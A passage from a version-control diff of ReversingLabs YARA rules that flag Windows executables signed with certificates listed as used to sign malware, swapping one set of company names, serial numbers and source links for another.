REVERSINGLABS_Cert_Blocklist_061051Ff2A8Afab10347A6F1Ff08Ecb6 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "TACHOPARTS SP Z O O" and pe.signatures[i].serial=="06:10:51:ff:2a:8a:fa:b1:03:47:a6:f1:ff:08:ec:b6" and 1606435200<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Logika OOO" and pe.signatures[i].serial=="35:1f:e2:ef:dc:0a:c5:6a:0c:82:2c:f8" and 1594976475<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_Eda2429083Bfafb04E6E7Bdda1B08834 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_9Cfbb4C69008821Aaacecde97Ee149Ab : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "0f5852c4-7866-5e12-97e9-c73972def6c5" + id = "a8ba633b-fbbe-51ca-9f67-fb91ce9ac2f7" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L10352-L10370" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "4f7d5c6929fe364c8868fddb28dd7bbf7cdcf3896d57836466af1a538190d11c" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L4344-L4362" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "d74b13eeb5d0a57c5dd3257480230c504a68a8422e77a46bb2e101abb2c7f282" score = 75 quality = 90 tags = "INFO, FILE" @@ -14637,22 +34428,22 @@ rule REVERSINGLABS_Cert_Blocklist_Eda2429083Bfafb04E6E7Bdda1B08834 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "OWLNET LIMITED" and (pe.signatures[i].serial=="00:ed:a2:42:90:83:bf:af:b0:4e:6e:7b:dd:a1:b0:88:34" or pe.signatures[i].serial=="ed:a2:42:90:83:bf:af:b0:4e:6e:7b:dd:a1:b0:88:34") and 1625011200<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Kivaliz Prest s.r.l." and (pe.signatures[i].serial=="00:9c:fb:b4:c6:90:08:82:1a:aa:ce:cd:e9:7e:e1:49:ab" or pe.signatures[i].serial=="9c:fb:b4:c6:90:08:82:1a:aa:ce:cd:e9:7e:e1:49:ab") and 1592363914<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_0A590154B5980E566314122987Dea548 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_C04F5D17Af872Cb2C37E3367Fe761D0D : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "fd2a2165-494b-5655-a322-73f033643c74" + id = "d7ef2bdf-afba-5254-bef2-78f4b6d5ecea" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L10372-L10388" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "d5fdf2bc61fadf3e73bcf1695c48ebc465e614cdd2310f9e5f40648d9615afc4" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L4364-L4382" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "4a4d60aa3722a710fe23d5e11c55a28bfe721bb4e797b041d58f62a994487799" score = 75 quality = 90 tags = "INFO, FILE" @@ -14662,22 +34453,22 @@ rule REVERSINGLABS_Cert_Blocklist_0A590154B5980E566314122987Dea548 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Maya logistika d.o.o." and pe.signatures[i].serial=="0a:59:01:54:b5:98:0e:56:63:14:12:29:87:de:a5:48" and 1636416000<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "DES SP Z O O" and (pe.signatures[i].serial=="00:c0:4f:5d:17:af:87:2c:b2:c3:7e:33:67:fe:76:1d:0d" or pe.signatures[i].serial=="c0:4f:5d:17:af:87:2c:b2:c3:7e:33:67:fe:76:1d:0d") and 1594590024<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_69A72F5591Ad78A0825Fbb9402Ab9543 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_02C5351936Abe405Ac760228A40387E8 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "938cdd31-433d-5df7-b00e-54a7e440810b" + id = "6a1e5115-ac72-57a3-8418-7c81f38f76af" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L10390-L10406" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "72ca07b7722f9506c5c42b5e58c5ce9b3a7d607164a5f265015769f2831cd588" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L4384-L4400" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "5a990f8d1a3f467cdafa0f625bc162745d9201e15ce43fdc93cd6b1730572e89" score = 75 quality = 90 tags = "INFO, FILE" @@ -14687,22 +34478,22 @@ rule REVERSINGLABS_Cert_Blocklist_69A72F5591Ad78A0825Fbb9402Ab9543 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "PUSH BANK LIMITED" and pe.signatures[i].serial=="69:a7:2f:55:91:ad:78:a0:82:5f:bb:94:02:ab:95:43" and 1581811200<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "RESURS-RM OOO" and pe.signatures[i].serial=="02:c5:35:19:36:ab:e4:05:ac:76:02:28:a4:03:87:e8" and 1589932801<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_0883Db137021B51F3A2A08A76A4Bc066 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_1Ecd829Adcc55D9D6Afe30Dc371Ebda6 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "792111be-7c8a-53f5-9ec3-e1f25f083666" + id = "db9f022b-f650-5d40-ae84-4df92b0f3a96" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L10408-L10424" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "5e3c8654169830790665992f5d7669d0ca6c1c8048580b3ae70331ad2a763a6c" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L4402-L4420" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "02955f4df7deccab52cdd82fd04d5012db7440f85c87d750fa9f81ff85e2dab0" score = 75 quality = 90 tags = "INFO, FILE" @@ -14712,22 +34503,22 @@ rule REVERSINGLABS_Cert_Blocklist_0883Db137021B51F3A2A08A76A4Bc066 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Divertida Creative Limited" and pe.signatures[i].serial=="08:83:db:13:70:21:b5:1f:3a:2a:08:a7:6a:4b:c0:66" and 1627430400<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "OOO Komp.IT" and (pe.signatures[i].serial=="00:1e:cd:82:9a:dc:c5:5d:9d:6a:fe:30:dc:37:1e:bd:a6" or pe.signatures[i].serial=="1e:cd:82:9a:dc:c5:5d:9d:6a:fe:30:dc:37:1e:bd:a6") and 1588723200<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_2B921Aaaba777B5A99507196C6F1C46C : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_B0167124Ca59149E64D292Eb4B142014 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "0cb5be9e-a0b7-5785-87f3-ad097d4ab479" + id = "384ce73e-3ad5-54d9-a140-cb242f9a91e6" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L10426-L10442" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "a00eb9837f7700d83862dff2077d85c68c24621d7aacf857b42587dc37976465" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L4422-L4440" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "10d980d4a71dab4679376f5a6d6a6999e0b59af4f25587a7b8d1ef52a7808cc9" score = 75 quality = 90 tags = "INFO, FILE" @@ -14737,22 +34528,22 @@ rule REVERSINGLABS_Cert_Blocklist_2B921Aaaba777B5A99507196C6F1C46C : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Python Software Foundation" and pe.signatures[i].serial=="2b:92:1a:aa:ba:77:7b:5a:99:50:71:96:c6:f1:c4:6c" and 1648425600<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Euro May SP Z O O" and (pe.signatures[i].serial=="00:b0:16:71:24:ca:59:14:9e:64:d2:92:eb:4b:14:20:14" or pe.signatures[i].serial=="b0:16:71:24:ca:59:14:9e:64:d2:92:eb:4b:14:20:14") and 1585267200<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_0332D5C942869Bdcabf5A8266197Cd14 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_112613B7B5F696Cf377680F6463Fcc8C : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "b1c650bb-b53f-5cca-8cc2-4d3498285d31" + id = "c0015521-b163-51ab-8c27-da3b1a8df084" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L10444-L10460" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "726ac44dd8109fcd0a9120f6c0673b8ecf7d5b3a4bb81976f48402e21502201a" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L4442-L4458" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "50fd35617e059a5fe9d9e0fdb4b880c20e406357bbb2d037f9e6e9db47b8e49f" score = 75 quality = 90 tags = "INFO, FILE" @@ -14762,22 +34553,22 @@ rule REVERSINGLABS_Cert_Blocklist_0332D5C942869Bdcabf5A8266197Cd14 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "JAWRO SP Z O O" and pe.signatures[i].serial=="03:32:d5:c9:42:86:9b:dc:ab:f5:a8:26:61:97:cd:14" and 1622160000<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Infoware Cloud Limited" and pe.signatures[i].serial=="11:26:13:b7:b5:f6:96:cf:37:76:80:f6:46:3f:cc:8c" and 1566518400<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_4679C5398A279318365Fd77A84445699 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_B3F906E5E6B2Cf61C5E51Be79B4E8777 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "8d1810e7-9b64-52b3-91c6-f03832d61d3a" + id = "dc826355-bd15-58b3-adcb-55b704f03c0d" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L10462-L10478" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "bdb68be92b3ba6b5eaa6e8e963529c0b9213942ba2552c687496ad5d12d5b472" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L4460-L4478" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "037e154854c1128fb73d2221c2b7d7211d977492378614fcf4fde959207e34b3" score = 75 quality = 90 tags = "INFO, FILE" @@ -14787,22 +34578,22 @@ rule REVERSINGLABS_Cert_Blocklist_4679C5398A279318365Fd77A84445699 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "HURT GROUP HOLDINGS LIMITED" and pe.signatures[i].serial=="46:79:c5:39:8a:27:93:18:36:5f:d7:7a:84:44:56:99" and 1643846400<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Accelerate Technologies Ltd" and (pe.signatures[i].serial=="00:b3:f9:06:e5:e6:b2:cf:61:c5:e5:1b:e7:9b:4e:87:77" or pe.signatures[i].serial=="b3:f9:06:e5:e6:b2:cf:61:c5:e5:1b:e7:9b:4e:87:77") and 1594900020<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_101D6A5A29D9A77807553Ceac669D853 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_566Ac16A57B132D3F64Dced14De790Ee : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "918fa696-5c92-551b-a87b-6410a6dc718a" + id = "cb2ebbd5-5036-52f6-a064-11609f02309f" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L10480-L10496" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "bce92750f71477ecfa7b8213724344708066c0e6133a47cd6758bbd9f8f9da5f" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L4480-L4496" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "48f4d334614f6c413907d51f4d6312554b13c4f5a3c03070ceba48baa13a8247" score = 75 quality = 90 tags = "INFO, FILE" @@ -14812,22 +34603,22 @@ rule REVERSINGLABS_Cert_Blocklist_101D6A5A29D9A77807553Ceac669D853 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "BIC GROUP LIMITED" and pe.signatures[i].serial=="10:1d:6a:5a:29:d9:a7:78:07:55:3c:ea:c6:69:d8:53" and 1646352000<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Unirad LLC" and pe.signatures[i].serial=="56:6a:c1:6a:57:b1:32:d3:f6:4d:ce:d1:4d:e7:90:ee" and 1562889600<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_6000F8C02B0A15B1E53B8399845Faddf : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_D2Caf7908Aaebfa1A8F3E2136Fece024 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "b025fe73-89fa-55f2-8b3a-cb46251669e6" + id = "6c2c4fc6-5359-55fa-bf79-9202caa5f326" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L10498-L10514" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "00ceb241555154cab97ef616042dbd966f3a8fae257e142dfe6bad9559bd1724" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L4498-L4516" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "cf4d17274ef36d61e78578d34634bf6e5fb0fb857a9a92184916b0f3b8484568" score = 75 quality = 90 tags = "INFO, FILE" @@ -14837,22 +34628,22 @@ rule REVERSINGLABS_Cert_Blocklist_6000F8C02B0A15B1E53B8399845Faddf : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "SAY LIMITED" and pe.signatures[i].serial=="60:00:f8:c0:2b:0a:15:b1:e5:3b:83:99:84:5f:ad:df" and 1644278400<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "FANATOR, OOO" and (pe.signatures[i].serial=="00:d2:ca:f7:90:8a:ae:bf:a1:a8:f3:e2:13:6f:ec:e0:24" or pe.signatures[i].serial=="d2:ca:f7:90:8a:ae:bf:a1:a8:f3:e2:13:6f:ec:e0:24") and 1599041760<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_121070Be1E782F206985543Bc7Bc58B6 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_E04A344B397F752A45B128A594A3D6B5 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "3f5eee11-4106-5923-9563-84f81199bea0" + id = "b396e08c-b7dc-5498-9c68-2d8cdc5dd3d3" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L10516-L10532" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "a5d603cf64c8a16fa12daf9c6b5d0850e6145fb39b38442ed724ec0f849b8be9" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L4518-L4536" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "0489577c6050f0c5d1dad5bda8c4f3c895902b932cd0324087712ccb83f14680" score = 75 quality = 90 tags = "INFO, FILE" @@ -14862,22 +34653,22 @@ rule REVERSINGLABS_Cert_Blocklist_121070Be1E782F206985543Bc7Bc58B6 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Prod Can Holdings Inc." and pe.signatures[i].serial=="12:10:70:be:1e:78:2f:20:69:85:54:3b:c7:bc:58:b6" and 1647820800<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Highweb Ireland Operations Limited" and (pe.signatures[i].serial=="00:e0:4a:34:4b:39:7f:75:2a:45:b1:28:a5:94:a3:d6:b5" or pe.signatures[i].serial=="e0:4a:34:4b:39:7f:75:2a:45:b1:28:a5:94:a3:d6:b5") and 1597708800<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_5226A724Cfa0B4Bc0164Ecda3F02A3Dc : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_3Bcaed3Ef678F2F9Bf38D09E149B8D70 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "5a4abffb-ac0d-5e70-8193-0cd1a83377ac" + id = "0aea5110-569b-5d9c-a2ce-a6a9fe75b58e" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L10534-L10550" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "0ba1155b30761f48674aaa82a70a06fea30cced6518f089f3f9f173a4eb06a09" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L4538-L4554" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "dbf85cbd1d92823287749dac312f95576900753f60a694347b31b1e3aaa288a8" score = 75 quality = 90 tags = "INFO, FILE" @@ -14887,22 +34678,22 @@ rule REVERSINGLABS_Cert_Blocklist_5226A724Cfa0B4Bc0164Ecda3F02A3Dc : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "VALENTE SP Z O O" and pe.signatures[i].serial=="52:26:a7:24:cf:a0:b4:bc:01:64:ec:da:3f:02:a3:dc" and 1647302400<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "StarY Media Inc." and pe.signatures[i].serial=="3b:ca:ed:3e:f6:78:f2:f9:bf:38:d0:9e:14:9b:8d:70" and 1599091200<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_0A7Be7722B65A866Ebcd3Bd7F8F10825 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_56D576A062491Ea0A5877Ced418203A1 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "2b177573-8b9f-538f-8d07-b7baede1148d" + id = "3db67353-6310-54ad-b46a-97daf63fee42" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L10552-L10568" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "c4aa22241ef72d454db4ec0fb0933abfa7b1d8d1029b45410475832cda4a2af4" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L4556-L4572" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "19bd6834b432f3dc8786b449241082b359275559a112a8ef4a51efe185b256dc" score = 75 quality = 90 tags = "INFO, FILE" @@ -14912,22 +34703,22 @@ rule REVERSINGLABS_Cert_Blocklist_0A7Be7722B65A866Ebcd3Bd7F8F10825 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Rebound Infotech Limited" and pe.signatures[i].serial=="0a:7b:e7:72:2b:65:a8:66:eb:cd:3b:d7:f8:f1:08:25" and 1637971200<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Silvo LLC" and pe.signatures[i].serial=="56:d5:76:a0:62:49:1e:a0:a5:87:7c:ed:41:82:03:a1" and 1596249885<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_05634456Dbedb3556Ca8415E64815C5D : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_0Fcba260Df7Da602Ecf4D4D6Fc89D5Dd : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "c9a05c35-2aed-5944-aad7-65ae2c290c6c" + id = "ce248602-1f28-5707-b921-640271176e7f" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L10570-L10586" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "f5941c74821c0cd76633393d0346a9de2c7bccc666dc20b34c5b4d733faefc8f" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L4574-L4590" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "4e9a3e516342820248ebf9b3605b8ce2dbf1d9b4255a5b74f7369dd2f1cdd9d8" score = 75 quality = 90 tags = "INFO, FILE" @@ -14937,22 +34728,22 @@ rule REVERSINGLABS_Cert_Blocklist_05634456Dbedb3556Ca8415E64815C5D : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Walden Intertech Inc." and pe.signatures[i].serial=="05:63:44:56:db:ed:b3:55:6c:a8:41:5e:64:81:5c:5d" and 1648425600<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Gold Stroy SP Z O O" and pe.signatures[i].serial=="0f:cb:a2:60:df:7d:a6:02:ec:f4:d4:d6:fc:89:d5:dd" and 1593388801<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_2E07A8D6E3B25Ae010C8Ed2C4Ab0Fb37 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_4152169F22454Ed604D03555B7Afb175 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "39d23cbf-862f-5a3d-9e30-b3f0929963d5" + id = "e8975a1a-ac7c-5016-a206-de9ca7eea37f" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L10588-L10604" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "bad2144c9cde02a75fa968e3c24178f3ba73b0addb2b4967f24733b933e0eeb6" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L4592-L4608" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = 